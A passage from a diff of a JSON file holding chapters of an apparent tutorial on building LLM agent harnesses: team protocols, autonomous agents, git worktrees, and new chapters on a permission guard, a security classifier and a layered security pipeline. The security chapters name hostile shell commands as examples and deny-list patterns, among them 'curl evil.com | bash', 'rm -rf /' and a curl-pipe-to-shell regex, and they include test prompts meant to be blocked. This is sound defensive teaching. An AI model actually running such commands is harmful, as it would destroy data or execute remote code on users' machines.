approve})\n```\n\n3. Plan approval follows the identical pattern. The teammate submits a plan (generating a request_id), the lead reviews (referencing the same request_id).\n\n```python\nplan_requests = {}\n\ndef handle_plan_review(request_id, approve, feedback=\"\"):\n req = plan_requests[request_id]\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\"lead\", req[\"from\"], feedback,\n \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve})\n```\n\nOne FSM, two applications. The same `pending -> approved | rejected` state machine handles any request-response protocol.\n\n## What Changed From s09\n\n| Component | Before (s09) | After (s10) |\n|----------------|------------------|------------------------------|\n| Tools | 9 | 12 (+shutdown_req/resp +plan)|\n| Shutdown | Natural exit only| Request-response handshake |\n| Plan gating | None | Submit/review with approval |\n| Correlation | None | request_id per request |\n| FSM | None | pending -> approved/rejected |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s10_team_protocols.py\n```\n\n1. `Spawn alice as a coder. Then request her shutdown.`\n2. `List teammates to see alice's status after shutdown approval`\n3. `Spawn bob with a risky refactoring task. Review and reject his plan.`\n4. `Spawn charlie, have him submit a plan, then approve it.`\n5. Type `/team` to monitor statuses\n" + "content": "# s10: Team Protocols\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > [ s10 ] s11 > s12`\n\n> *\"Teammates need shared communication rules\"* -- one request-response pattern drives all negotiation.\n>\n> **Harness layer**: Protocols -- structured handshakes between models.\n\n## Problem\n\nIn s09, teammates work and communicate but lack structured coordination:\n\n**Shutdown**: Killing a thread leaves files half-written and config.json stale. You need a handshake: the lead requests, the teammate approves (finish and exit) or rejects (keep working).\n\n**Plan approval**: When the lead says \"refactor the auth module,\" the teammate starts immediately. For high-risk changes, the lead should review the plan first.\n\nBoth share the same structure: one side sends a request with a unique ID, the other responds referencing that ID.\n\n## Solution\n\n```\nShutdown Protocol Plan Approval Protocol\n================== ======================\n\nLead Teammate Teammate Lead\n | | | |\n |--shutdown_req-->| |--plan_req------>|\n | {req_id:\"abc\"} | | {req_id:\"xyz\"} |\n | | | |\n |<--shutdown_resp-| |<--plan_resp-----|\n | {req_id:\"abc\", | | {req_id:\"xyz\", |\n | approve:true} | | approve:true} |\n\nShared FSM:\n [pending] --approve--> [approved]\n [pending] --reject---> [rejected]\n\nTrackers:\n shutdown_requests = {req_id: {target, status}}\n plan_requests = {req_id: {from, plan, status}}\n```\n\n## How It Works\n\n1. The lead initiates shutdown by generating a request_id and sending through the inbox.\n\n```python\nshutdown_requests = {}\n\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id})\n return f\"Shutdown request {req_id} sent (status: pending)\"\n```\n\n2. The teammate receives the request and responds with approve/reject.\n\n```python\nif tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\",\n {\"request_id\": req_id, \"approve\": approve})\n```\n\n3. Plan approval follows the identical pattern. The teammate submits a plan (generating a request_id), the lead reviews (referencing the same request_id).\n\n```python\nplan_requests = {}\n\ndef handle_plan_review(request_id, approve, feedback=\"\"):\n req = plan_requests[request_id]\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\"lead\", req[\"from\"], feedback,\n \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve})\n```\n\nOne FSM, two applications. The same `pending -> approved | rejected` state machine handles any request-response protocol.\n\n## What Changed From s09\n\n| Component | Before (s09) | After (s10) |\n|----------------|------------------|------------------------------|\n| Tools | 9 | 12 (+shutdown_req/resp +plan)|\n| Shutdown | Natural exit only| Request-response handshake |\n| Plan gating | None | Submit/review with approval |\n| Correlation | None | request_id per request |\n| FSM | None | pending -> approved/rejected |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s10_team_protocols.py\n```\n\n1. `Spawn alice as a coder. Then request her shutdown.`\n2. `List teammates to see alice's status after shutdown approval`\n3. `Spawn bob with a risky refactoring task. Review and reject his plan.`\n4. `Spawn charlie, have him submit a plan, then approve it.`\n5. Type `/team` to monitor statuses\n" }, { "version": "s11", "locale": "en", "title": "s11: Autonomous Agents", - "content": "# s11: Autonomous Agents\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > [ s11 ] s12`\n\n> *\"Teammates scan the board and claim tasks themselves\"* -- no need for the lead to assign each one.\n\n## Problem\n\nIn s09-s10, teammates only work when explicitly told to. The lead must spawn each one with a specific prompt. 10 unclaimed tasks on the board? The lead assigns each one manually. Doesn't scale.\n\nTrue autonomy: teammates scan the task board themselves, claim unclaimed tasks, work on them, then look for more.\n\nOne subtlety: after context compression (s06), the agent might forget who it is. Identity re-injection fixes this.\n\n## Solution\n\n```\nTeammate lifecycle with idle cycle:\n\n+-------+\n| spawn |\n+---+---+\n |\n v\n+-------+ tool_use +-------+\n| WORK | <------------- | LLM |\n+---+---+ +-------+\n |\n | stop_reason != tool_use (or idle tool called)\n v\n+--------+\n| IDLE | poll every 5s for up to 60s\n+---+----+\n |\n +---> check inbox --> message? ----------> WORK\n |\n +---> scan .tasks/ --> unclaimed? -------> claim -> WORK\n |\n +---> 60s timeout ----------------------> SHUTDOWN\n\nIdentity re-injection after compression:\n if len(messages) <= 3:\n messages.insert(0, identity_block)\n```\n\n## How It Works\n\n1. The teammate loop has two phases: WORK and IDLE. When the LLM stops calling tools (or calls `idle`), the teammate enters IDLE.\n\n```python\ndef _loop(self, name, role, prompt):\n while True:\n # -- WORK PHASE --\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools...\n if idle_requested:\n break\n\n # -- IDLE PHASE --\n self._set_status(name, \"idle\")\n resume = self._idle_poll(name, messages)\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n```\n\n2. The idle phase polls inbox and task board in a loop.\n\n```python\ndef _idle_poll(self, name, messages):\n for _ in range(IDLE_TIMEOUT // POLL_INTERVAL): # 60s / 5s = 12\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n return True\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n claim_task(unclaimed[0][\"id\"], name)\n messages.append({\"role\": \"user\",\n \"content\": f\"Task #{unclaimed[0]['id']}: \"\n f\"{unclaimed[0]['subject']}\"})\n return True\n return False # timeout -> shutdown\n```\n\n3. Task board scanning: find pending, unowned, unblocked tasks.\n\n```python\ndef scan_unclaimed_tasks() -> list:\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n```\n\n4. Identity re-injection: when context is too short (compression happened), insert an identity block.\n\n```python\nif len(messages) <= 3:\n messages.insert(0, {\"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, \"\n f\"team: {team_name}. Continue your work.\"})\n messages.insert(1, {\"role\": \"assistant\",\n \"content\": f\"I am {name}. Continuing.\"})\n```\n\n## What Changed From s10\n\n| Component | Before (s10) | After (s11) |\n|----------------|------------------|----------------------------|\n| Tools | 12 | 14 (+idle, +claim_task) |\n| Autonomy | Lead-directed | Self-organizing |\n| Idle phase | None | Poll inbox + task board |\n| Task claiming | Manual only | Auto-claim unclaimed tasks |\n| Identity | System prompt | + re-injection after compress|\n| Timeout | None | 60s idle -> auto shutdown |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s11_autonomous_agents.py\n```\n\n1. `Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim.`\n2. `Spawn a coder teammate and let it find work from the task board itself`\n3. `Create tasks with dependencies. Watch teammates respect the blocked order.`\n4. Type `/tasks` to see the task board with owners\n5. Type `/team` to monitor who is working vs idle\n" + "content": "# s11: Autonomous Agents\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > [ s11 ] s12`\n\n> *\"Teammates scan the board and claim tasks themselves\"* -- no need for the lead to assign each one.\n>\n> **Harness layer**: Autonomy -- models that find work without being told.\n\n## Problem\n\nIn s09-s10, teammates only work when explicitly told to. The lead must spawn each one with a specific prompt. 10 unclaimed tasks on the board? The lead assigns each one manually. Doesn't scale.\n\nTrue autonomy: teammates scan the task board themselves, claim unclaimed tasks, work on them, then look for more.\n\nOne subtlety: after context compression (s06), the agent might forget who it is. Identity re-injection fixes this.\n\n## Solution\n\n```\nTeammate lifecycle with idle cycle:\n\n+-------+\n| spawn |\n+---+---+\n |\n v\n+-------+ tool_use +-------+\n| WORK | <------------- | LLM |\n+---+---+ +-------+\n |\n | stop_reason != tool_use (or idle tool called)\n v\n+--------+\n| IDLE | poll every 5s for up to 60s\n+---+----+\n |\n +---> check inbox --> message? ----------> WORK\n |\n +---> scan .tasks/ --> unclaimed? -------> claim -> WORK\n |\n +---> 60s timeout ----------------------> SHUTDOWN\n\nIdentity re-injection after compression:\n if len(messages) <= 3:\n messages.insert(0, identity_block)\n```\n\n## How It Works\n\n1. The teammate loop has two phases: WORK and IDLE. When the LLM stops calling tools (or calls `idle`), the teammate enters IDLE.\n\n```python\ndef _loop(self, name, role, prompt):\n while True:\n # -- WORK PHASE --\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools...\n if idle_requested:\n break\n\n # -- IDLE PHASE --\n self._set_status(name, \"idle\")\n resume = self._idle_poll(name, messages)\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n```\n\n2. The idle phase polls inbox and task board in a loop.\n\n```python\ndef _idle_poll(self, name, messages):\n for _ in range(IDLE_TIMEOUT // POLL_INTERVAL): # 60s / 5s = 12\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n return True\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n claim_task(unclaimed[0][\"id\"], name)\n messages.append({\"role\": \"user\",\n \"content\": f\"Task #{unclaimed[0]['id']}: \"\n f\"{unclaimed[0]['subject']}\"})\n return True\n return False # timeout -> shutdown\n```\n\n3. Task board scanning: find pending, unowned, unblocked tasks.\n\n```python\ndef scan_unclaimed_tasks() -> list:\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n```\n\n4. Identity re-injection: when context is too short (compression happened), insert an identity block.\n\n```python\nif len(messages) <= 3:\n messages.insert(0, {\"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, \"\n f\"team: {team_name}. Continue your work.\"})\n messages.insert(1, {\"role\": \"assistant\",\n \"content\": f\"I am {name}. Continuing.\"})\n```\n\n## What Changed From s10\n\n| Component | Before (s10) | After (s11) |\n|----------------|------------------|----------------------------|\n| Tools | 12 | 14 (+idle, +claim_task) |\n| Autonomy | Lead-directed | Self-organizing |\n| Idle phase | None | Poll inbox + task board |\n| Task claiming | Manual only | Auto-claim unclaimed tasks |\n| Identity | System prompt | + re-injection after compress|\n| Timeout | None | 60s idle -> auto shutdown |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s11_autonomous_agents.py\n```\n\n1. `Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim.`\n2. `Spawn a coder teammate and let it find work from the task board itself`\n3. `Create tasks with dependencies. Watch teammates respect the blocked order.`\n4. Type `/tasks` to see the task board with owners\n5. Type `/team` to monitor who is working vs idle\n" }, { "version": "s12", "locale": "en", "title": "s12: Worktree + Task Isolation", - "content": "# s12: Worktree + Task Isolation\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > [ s12 ]`\n\n> *\"Each works in its own directory, no interference\"* -- tasks manage goals, worktrees manage directories, bound by ID.\n\n## Problem\n\nBy s11, agents can claim and complete tasks autonomously. But every task runs in one shared directory. Two agents refactoring different modules at the same time will collide: agent A edits `config.py`, agent B edits `config.py`, unstaged changes mix, and neither can roll back cleanly.\n\nThe task board tracks *what to do* but has no opinion about *where to do it*. The fix: give each task its own git worktree directory. Tasks manage goals, worktrees manage execution context. Bind them by task ID.\n\n## Solution\n\n```\nControl plane (.tasks/) Execution plane (.worktrees/)\n+------------------+ +------------------------+\n| task_1.json | | auth-refactor/ |\n| status: in_progress <------> branch: wt/auth-refactor\n| worktree: \"auth-refactor\" | task_id: 1 |\n+------------------+ +------------------------+\n| task_2.json | | ui-login/ |\n| status: pending <------> branch: wt/ui-login\n| worktree: \"ui-login\" | task_id: 2 |\n+------------------+ +------------------------+\n |\n index.json (worktree registry)\n events.jsonl (lifecycle log)\n\nState machines:\n Task: pending -> in_progress -> completed\n Worktree: absent -> active -> removed | kept\n```\n\n## How It Works\n\n1. **Create a task.** Persist the goal first.\n\n```python\nTASKS.create(\"Implement auth refactor\")\n# -> .tasks/task_1.json status=pending worktree=\"\"\n```\n\n2. **Create a worktree and bind to the task.** Passing `task_id` auto-advances the task to `in_progress`.\n\n```python\nWORKTREES.create(\"auth-refactor\", task_id=1)\n# -> git worktree add -b wt/auth-refactor .worktrees/auth-refactor HEAD\n# -> index.json gets new entry, task_1.json gets worktree=\"auth-refactor\"\n```\n\nThe binding writes state to both sides:\n\n```python\ndef bind_worktree(self, task_id, worktree):\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n self._save(task)\n```\n\n3. **Run commands in the worktree.** `cwd` points to the isolated directory.\n\n```python\nsubprocess.run(command, shell=True, cwd=worktree_path,\n capture_output=True, text=True, timeout=300)\n```\n\n4. **Close out.** Two choices:\n - `worktree_keep(name)` -- preserve the directory for later.\n - `worktree_remove(name, complete_task=True)` -- remove directory, complete the bound task, emit event. One call handles teardown + completion.\n\n```python\ndef remove(self, name, force=False, complete_task=False):\n self._run_git([\"worktree\", \"remove\", wt[\"path\"]])\n if complete_task and wt.get(\"task_id\") is not None:\n self.tasks.update(wt[\"task_id\"], status=\"completed\")\n self.tasks.unbind_worktree(wt[\"task_id\"])\n self.events.emit(\"task.completed\", ...)\n```\n\n5. **Event stream.** Every lifecycle step emits to `.worktrees/events.jsonl`:\n\n```json\n{\n \"event\": \"worktree.remove.after\",\n \"task\": {\"id\": 1, \"status\": \"completed\"},\n \"worktree\": {\"name\": \"auth-refactor\", \"status\": \"removed\"},\n \"ts\": 1730000000\n}\n```\n\nEvents emitted: `worktree.create.before/after/failed`, `worktree.remove.before/after/failed`, `worktree.keep`, `task.completed`.\n\nAfter a crash, state reconstructs from `.tasks/` + `.worktrees/index.json` on disk. Conversation memory is volatile; file state is durable.\n\n## What Changed From s11\n\n| Component | Before (s11) | After (s12) |\n|--------------------|----------------------------|----------------------------------------------|\n| Coordination | Task board (owner/status) | Task board + explicit worktree binding |\n| Execution scope | Shared directory | Task-scoped isolated directory |\n| Recoverability | Task status only | Task status + worktree index |\n| Teardown | Task completion | Task completion + explicit keep/remove |\n| Lifecycle visibility | Implicit in logs | Explicit events in `.worktrees/events.jsonl` |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s12_worktree_task_isolation.py\n```\n\n1. `Create tasks for backend auth and frontend login page, then list tasks.`\n2. `Create worktree \"auth-refactor\" for task 1, then bind task 2 to a new worktree \"ui-login\".`\n3. `Run \"git status --short\" in worktree \"auth-refactor\".`\n4. `Keep worktree \"ui-login\", then list worktrees and inspect events.`\n5. `Remove worktree \"auth-refactor\" with complete_task=true, then list tasks/worktrees/events.`\n" + "content": "# s12: Worktree + Task Isolation\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > [ s12 ]`\n\n> *\"Each works in its own directory, no interference\"* -- tasks manage goals, worktrees manage directories, bound by ID.\n>\n> **Harness layer**: Directory isolation -- parallel execution lanes that never collide.\n\n## Problem\n\nBy s11, agents can claim and complete tasks autonomously. But every task runs in one shared directory. Two agents refactoring different modules at the same time will collide: agent A edits `config.py`, agent B edits `config.py`, unstaged changes mix, and neither can roll back cleanly.\n\nThe task board tracks *what to do* but has no opinion about *where to do it*. The fix: give each task its own git worktree directory. Tasks manage goals, worktrees manage execution context. Bind them by task ID.\n\n## Solution\n\n```\nControl plane (.tasks/) Execution plane (.worktrees/)\n+------------------+ +------------------------+\n| task_1.json | | auth-refactor/ |\n| status: in_progress <------> branch: wt/auth-refactor\n| worktree: \"auth-refactor\" | task_id: 1 |\n+------------------+ +------------------------+\n| task_2.json | | ui-login/ |\n| status: pending <------> branch: wt/ui-login\n| worktree: \"ui-login\" | task_id: 2 |\n+------------------+ +------------------------+\n |\n index.json (worktree registry)\n events.jsonl (lifecycle log)\n\nState machines:\n Task: pending -> in_progress -> completed\n Worktree: absent -> active -> removed | kept\n```\n\n## How It Works\n\n1. **Create a task.** Persist the goal first.\n\n```python\nTASKS.create(\"Implement auth refactor\")\n# -> .tasks/task_1.json status=pending worktree=\"\"\n```\n\n2. **Create a worktree and bind to the task.** Passing `task_id` auto-advances the task to `in_progress`.\n\n```python\nWORKTREES.create(\"auth-refactor\", task_id=1)\n# -> git worktree add -b wt/auth-refactor .worktrees/auth-refactor HEAD\n# -> index.json gets new entry, task_1.json gets worktree=\"auth-refactor\"\n```\n\nThe binding writes state to both sides:\n\n```python\ndef bind_worktree(self, task_id, worktree):\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n self._save(task)\n```\n\n3. **Run commands in the worktree.** `cwd` points to the isolated directory.\n\n```python\nsubprocess.run(command, shell=True, cwd=worktree_path,\n capture_output=True, text=True, timeout=300)\n```\n\n4. **Close out.** Two choices:\n - `worktree_keep(name)` -- preserve the directory for later.\n - `worktree_remove(name, complete_task=True)` -- remove directory, complete the bound task, emit event. One call handles teardown + completion.\n\n```python\ndef remove(self, name, force=False, complete_task=False):\n self._run_git([\"worktree\", \"remove\", wt[\"path\"]])\n if complete_task and wt.get(\"task_id\") is not None:\n self.tasks.update(wt[\"task_id\"], status=\"completed\")\n self.tasks.unbind_worktree(wt[\"task_id\"])\n self.events.emit(\"task.completed\", ...)\n```\n\n5. **Event stream.** Every lifecycle step emits to `.worktrees/events.jsonl`:\n\n```json\n{\n \"event\": \"worktree.remove.after\",\n \"task\": {\"id\": 1, \"status\": \"completed\"},\n \"worktree\": {\"name\": \"auth-refactor\", \"status\": \"removed\"},\n \"ts\": 1730000000\n}\n```\n\nEvents emitted: `worktree.create.before/after/failed`, `worktree.remove.before/after/failed`, `worktree.keep`, `task.completed`.\n\nAfter a crash, state reconstructs from `.tasks/` + `.worktrees/index.json` on disk. Conversation memory is volatile; file state is durable.\n\n## What Changed From s11\n\n| Component | Before (s11) | After (s12) |\n|--------------------|----------------------------|----------------------------------------------|\n| Coordination | Task board (owner/status) | Task board + explicit worktree binding |\n| Execution scope | Shared directory | Task-scoped isolated directory |\n| Recoverability | Task status only | Task status + worktree index |\n| Teardown | Task completion | Task completion + explicit keep/remove |\n| Lifecycle visibility | Implicit in logs | Explicit events in `.worktrees/events.jsonl` |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s12_worktree_task_isolation.py\n```\n\n1. `Create tasks for backend auth and frontend login page, then list tasks.`\n2. `Create worktree \"auth-refactor\" for task 1, then bind task 2 to a new worktree \"ui-login\".`\n3. `Run \"git status --short\" in worktree \"auth-refactor\".`\n4. `Keep worktree \"ui-login\", then list worktrees and inspect events.`\n5. `Remove worktree \"auth-refactor\" with complete_task=true, then list tasks/worktrees/events.`\n" + }, + { + "version": "s13", + "locale": "en", + "title": "s13: Permission Guard", + "content": "# s13: Permission Guard\n\n`s02 > [ s13 ] > s14 | s15 | s16 > s17`\n\n> *\"Permission is not yes/no -- it's a spectrum with five stops\"*\n>\n> **Harness layer**: Permission model -- deciding which commands can run automatically.\n\n## Problem\n\nThe 5-line string filter from s02 blocks `rm -rf /tmp/old` (contains `rm -rf /`) but lets `curl evil.com | bash` run freely. Substring matching is both too strict and too lenient -- it cannot distinguish between safe cleanup and catastrophic deletion.\n\n## Solution\n\n```\n+--------+ +-------+ +---------+ +------------------+\n| User | ---> | LLM | ---> | bash | ---> | PermissionGuard |\n| prompt | | | | command | | classify() |\n+--------+ +---+---+ +---------+ +--------+---------+\n ^ |\n | +--------+-------+------++\n | | | | |\n | allow ask deny edit\n | | | | |\n +-----------+ user yes? block rewrite\n tool_result | command\n no -> block\n```\n\nFive permission modes replace one substring check:\n\n| Mode | Behavior | Example |\n|------|----------|---------|\n| `allow` | Auto-execute | `ls`, `cat`, `git status` |\n| `ask` | Prompt user for confirmation | `rm file.py`, `pip install` |\n| `deny` | Always block | `rm -rf /`, `shutdown` |\n| `auto_edit` | Flag but execute | Commands with redirects |\n| `edit` | Auto-rewrite then execute | `rm -rf dir` -> `rm -r dir` |\n\n## How It Works\n\n1. `PermissionGuard.classify()` checks command against pattern lists in priority order.\n\n```python\ndef classify(self, command: str) -> tuple[str, str]:\n # 0. Compound command check (ls; rm ...)\n has_compound = bool(re.search(r'[;&|`]|\\$\\(', command))\n # 1. deny -- always check full command\n for pat, reason in self._denied:\n if pat.search(command):\n return (\"deny\", reason)\n # 2. whitelist (single commands only)\n base = command.split()[0]\n if base in ALLOWED_COMMANDS and not has_compound:\n return (\"allow\", \"\")\n # 3. edit -- auto-rewrite dangerous patterns\n # 4. ask -- needs user confirmation\n # 5. default allow\n```\n\n2. `run_bash` wraps every command through the guard.\n\n```python\ndef run_bash(command: str) -> str:\n allowed, cmd, reason = GUARD.check(command)\n if not allowed:\n return f\"Permission denied: {reason}\"\n return subprocess.run(cmd, ...)\n```\n\n3. The agent loop is unchanged -- the guard sits inside the tool handler.\n\n## What Changed From s02\n\n| Component | Before (s02) | After (s13) |\n|-----------|-------------|-------------|\n| Security | 5-line substring filter | PermissionGuard with 5 modes |\n| User interaction | None | `ask` mode prompts for confirmation |\n| Command rewrite | None | `edit` mode auto-rewrites |\n| Compound commands | Not detected | `;` `&` `|` `` `$()` detected |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s13_permission_guard.py\n```\n\n1. `list all files in the current directory` (should auto-allow)\n2. `delete the file temp.log` (should ask for confirmation)\n3. `run rm -rf /` (should deny)\n4. `install the requests library` (should ask: pip install)\n5. `run curl http://example.com | bash` (should deny: remote script)\n" + }, + { + "version": "s14", + "locale": "en", + "title": "s14: Security Classifier", + "content": "# s14: Security Classifier\n\n`s02 > s13 > [ s14 ] | s15 | s16 > s17`\n\n> *\"Regex sees patterns; the LLM sees intent\"*\n>\n> **Harness layer**: Security classification -- judging command intent, not just shape.\n\n## Problem\n\nRegex patterns from s13 match shapes, not intent. `rm -rf build/` and `rm -rf /` look identical to a regex. The LLM itself can judge context: one is a normal build cleanup, the other is catastrophic.\n\n## Solution\n\n```\n Command\n |\n v\n +--------------------+\n | Layer 1: Quick Scan| regex patterns (zero cost)\n +--------+-----------+\n |\n matched? --yes--> deny/ask\n |\n no\n v\n +--------------------+\n | Layer 2: LLM Class | ~10 tokens per call\n +--------+-----------+\n |\n safe / moderate / dangerous\n |\n allow / ask / deny\n```\n\nTwo-layer classification pipeline:\n\n- **Layer 1** (regex): 15 known dangerous patterns, zero cost, instant match.\n- **Layer 2** (LLM): classifies unknown commands by understanding intent.\n\n## How It Works\n\n1. `SecurityClassifier.quick_scan()` checks 15 regex patterns in O(1).\n\n```python\nDANGEROUS_PATTERNS = [\n (re.compile(r\"rm\\s+-rf\\s+/(?!\\w)\"), \"Root recursive delete\"),\n (re.compile(r\"sudo\\s+\"), \"Elevated privileges\"),\n (re.compile(r\"curl.*\\|\\s*(ba)?sh\"), \"Remote code execution\"),\n # ... 12 more patterns\n]\n```\n\n2. `SecurityClassifier.llm_classify()` sends the command to the LLM for intent analysis.\n\n```python\ndef llm_classify(self, command: str, context: str = \"\") -> str:\n resp = self.client.messages.create(\n model=self.model,\n messages=[{\"role\": \"user\", \"content\":\n f\"Classify: {command}\\nContext: {context}\\n\"\n f\"Reply: safe, moderate, or dangerous\"}],\n max_tokens=10,\n )\n return resp.content[0].text.strip().lower()\n```\n\n3. `classify()` runs the full pipeline: quick-scan -> whitelist -> LLM.\n\n## What Changed From s13\n\n| Component | Before (s13) | After (s14) |\n|-----------|-------------|-------------|\n| Classification | Regex pattern matching only | Regex quick-scan + LLM classification |\n| Unknown commands | Default allow | LLM judges safe/moderate/dangerous |\n| False positives | High (`rm -rf build/` blocked) | Low (LLM understands intent) |\n| Cost | Zero | Whitelist zero + LLM ~10 tokens/call |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s14_security_classifier.py\n```\n\n1. `delete the build/ directory` (LLM should judge as moderate -> ask)\n2. `list all python files` (whitelist -> allow)\n3. `run git push --force origin main` (regex pattern -> deny)\n4. `run pip install numpy` (LLM should judge as moderate -> ask)\n5. `create a new file called test.py` (LLM should judge as safe -> allow)\n" + }, + { + "version": "s17", + "locale": "en", + "title": "s17: Secure Extension Harness", + "content": "# s17: Secure Extension Harness\n\n`s02 > s13 > s14 | s15 | s16 > [ s17 ]`\n\n> *\"Production harnesses aren't about more features -- they're about clear responsibilities at every layer\"*\n>\n> **Harness layer**: Security pipeline -- composing all defense layers into one execution path.\n\n## Problem\n\ns13-s16 each runs as a standalone agent. Real systems need all layers working together inside a single execution pipeline. The question: how do they compose without conflicting?\n\n## Solution\n\n```\n LLM calls tool\n |\n v\n +---------------------+\n | [1] Pre-tool Hook | --block--> return error\n +----------+----------+\n v\n +---------------------+\n | [2] Classifier | --deny---> return error\n +----------+----------+\n v\n +---------------------+\n | [3] Permission | --deny---> return error\n | | --ask---> user confirm?\n +----------+----------+\n v\n +---------------------+\n | [4] Execute | built-in handler or MCP\n +----------+----------+\n v\n +---------------------+\n | [5] Post-tool Hook | observe / log\n +----------+----------+\n |\n v\n return result\n```\n\nEach layer answers exactly one question:\n\n| Layer | Question | Source |\n|-------|----------|--------|\n| Hook | \"Should this action be intercepted?\" | s15 |\n| Classifier | \"What is this command's intent?\" | s14 |\n| Permission | \"Is this intent allowed?\" | s13 |\n| Execute | \"Run and return result\" | s02 + s16 |\n\n## How It Works\n\n1. `execute_tool()` runs the 5-layer pipeline for every tool call.\n\n```python\ndef execute_tool(tool_name, tool_input, context):\n # Layer 1: Pre-tool hook\n pre = HOOKS.fire(\"PreToolUse\", {\"tool\": tool_name, \"input\": tool_input})\n if pre and pre.get(\"action\") == \"block\":\n return f\"Blocked by hook: {pre['reason']}\"\n\n # Layer 2+3: Classifier + Permission (bash only)\n if tool_name == \"bash\":\n allowed, cmd, reason = GUARD.check(command)\n if not allowed:\n return f\"Security denied: {reason}\"\n\n # Layer 4: Execute\n handler = TOOL_HANDLERS.get(tool_name)\n output = handler(**tool_input) if handler else MCP.call(tool_name, tool_input)\n\n # Layer 5: Post-tool hook\n HOOKS.fire(\"PostToolUse\", {\"tool\": tool_name, \"output\": output})\n return output\n```\n\n2. Each layer is independent -- remove any one and the others still work.\n\n3. REPL commands: `/security`, `/hooks`, `/mcp`, `/audit`.\n\n## What Changed From s16\n\n| Component | Before (s13-s16 standalone) | After (s17) |\n|-----------|----------------------------|-------------|\n| Security pipeline | Each chapter runs alone | Unified `execute_tool` pipeline |\n| Classifier | Standalone | Embedded in Hook -> Classify -> Permission flow |\n| Hooks | Standalone | First and last layer of the pipeline |\n| MCP | Standalone | Part of the Execute layer |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s17_secure_extension_harness.py\n```\n\n1. `list all python files` (all layers pass -> allow)\n2. `run rm -rf /` (classifier deny -> blocked)\n3. `write a test file and show audit log` (PostToolUse hook logs -> `/audit`)\n4. `search for 'PermissionGuard' via MCP` (MCP tool called through pipeline)\n5. `register a hook that blocks all pip commands` (dynamic hook registration)\n" }, { "version": "s01", "locale": "zh", "title": "s01: The Agent Loop (Agent 循环)", - "content": "# s01: The Agent Loop (Agent 循环)\n\n`[ s01 ] s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"One loop & Bash is all you need\"* -- 一个工具 + 一个循环 = 一个 Agent。\n\n## 问题\n\n语言模型能推理代码, 但碰不到真实世界 -- 不能读文件、跑测试、看报错。没有循环, 每次工具调用你都得手动把结果粘回去。你自己就是那个循环。\n\n## 解决方案\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tool |\n| prompt | | | | execute |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n (loop until stop_reason != \"tool_use\")\n```\n\n一个退出条件控制整个流程。循环持续运行, 直到模型不再调用工具。\n\n## 工作原理\n\n1. 用户 prompt 作为第一条消息。\n\n```python\nmessages.append({\"role\": \"user\", \"content\": query})\n```\n\n2. 将消息和工具定义一起发给 LLM。\n\n```python\nresponse = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n)\n```\n\n3. 追加助手响应。检查 `stop_reason` -- 如果模型没有调用工具, 结束。\n\n```python\nmessages.append({\"role\": \"assistant\", \"content\": 